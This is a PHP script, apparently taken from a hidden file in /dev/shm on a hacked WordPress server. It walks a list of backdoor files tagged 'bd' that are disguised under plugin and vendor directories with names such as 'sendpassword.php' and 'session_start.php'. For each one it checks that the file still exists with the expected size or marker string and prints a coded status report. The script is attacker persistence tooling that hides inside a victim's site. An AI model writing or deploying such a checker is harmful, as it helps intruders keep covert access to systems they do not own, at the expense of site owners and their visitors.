File: //dev/shm/.parameter_group
<?php $r = '/home/keepilnf/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php"=>"bd@@8817@@approve_request",
"/wp-content/plugins/wp-console/lib/php-8.0/vendor/nikic/php-parser/lib/PhpParser/Node/Scalar/String.php"=>"bd@@24595@@683",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Service/TestHelpers/Issuing/DiffieHellman.php"=>"bd@@13367@@900",
"/wp-content/plugins/custom_1766599821/comment-section-1766599822.php"=>"bd@@7480@@1029",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Util/Log/report_security.php"=>"bd@@24675@@1048",
"/wp-content/plugins/wp-console/lib/php-7.4/overrides/psy/psysh/src/Output/sendpassword.php"=>"bd@@13679@@595",
"/wp-content/plugins/file-manager-advanced/application/library/php-parser/vendor/nikic/php-parser/lib/PhpParser/Comment/fillSurveyAction.php"=>"bd@@24438@@942",
"/wp-content/plugins/wp-console/lib/php-8.4/vendor/psy/psysh/src/VarDumper/session_start.php"=>"bd@@13720@@585",
"/wp-content/plugins/wp-console/lib/php-8.4/vendor/nikic/php-parser/lib/PhpParser/PrettyPrinter/vhdl.php"=>"bd@@24731@@2064",
"/wp-content/plugins/wp-console/lib/php-8.4/vendor/nikic/php-parser/lib/PhpParser/Node/Const.php"=>"bd@@13247@@936",
"/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phpunit/phpunit/src/Framework/MockObject/Stub/parle_tokens.php"=>"bd@@24529@@2419",
"/wp-content/plugins/wpforms-lite/vendor_prefixed/ezyang/htmlpurifier/library/HTMLPurifier/DefinitionCache/rvscronjobctrl.php"=>"bd@@13813@@2641"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');